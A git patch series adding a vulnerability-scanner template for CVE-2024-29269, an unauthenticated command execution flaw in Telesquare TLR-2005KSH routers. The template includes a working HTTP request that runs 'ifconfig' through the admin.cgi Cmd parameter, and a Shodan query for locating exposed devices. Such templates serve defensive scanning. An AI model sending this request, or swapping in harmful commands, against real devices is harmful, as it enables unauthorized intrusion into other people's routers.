From 29001265cc3ac279711855a5a0db2df0387c4099 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Apr 2024 22:58:45 +0530 Subject: [PATCH 1/3] Create CVE-2024-29269.yaml --- http/cves/2024/CVE-2024-29269.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2024/CVE-2024-29269.yaml diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml new file mode 100644 index 0000000000..46d921fcb4 --- /dev/null +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -0,0 +1,41 @@ +id: CVE-2024-29269 + +info: + name: Telesquare TLR-2005KSH - Remote Command Execution + author: ritikchaddha + severity: critical + description: | + Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions. + reference: + - https://github.com/wutalent/CVE-2024-29269/blob/main/index.md + - https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-29269 + metadata: + max-request: 1 + shodan-query: title:"Login to TLR-2005KSH" + tags: cve,cve2024,telesquare,tlr,rce + +http: + - raw: + - | + GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - '' + - '' + + - type: word + part: header + words: + - 'text/xml' + + - type: status + status: + - 200 From cc0874c50378d55396cc450c52cd1addc10cf691 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Apr 2024 23:06:17 +0530 Subject: [PATCH 2/3] matchers update --- http/cves/2024/CVE-2024-29269.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 46d921fcb4..5fdcf3b853 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -21,15 +21,19 @@ info: http: - raw: - | - GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1 + GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfigff HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - - type: dsl - dsl: + - type: word + part: body + words: - '' - '' + - 'Ethernet' + - 'inet' + condition: and - type: word part: header From 603a507a22c113419dc7e0ce21eea02ec0cfe440 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Apr 2024 23:16:28 +0530 Subject: [PATCH 3/3] fix typo --- http/cves/2024/CVE-2024-29269.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 5fdcf3b853..419f7dddcf 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -21,7 +21,7 @@ info: http: - raw: - | - GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfigff HTTP/1.1 + GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1 Host: {{Hostname}} matchers-condition: and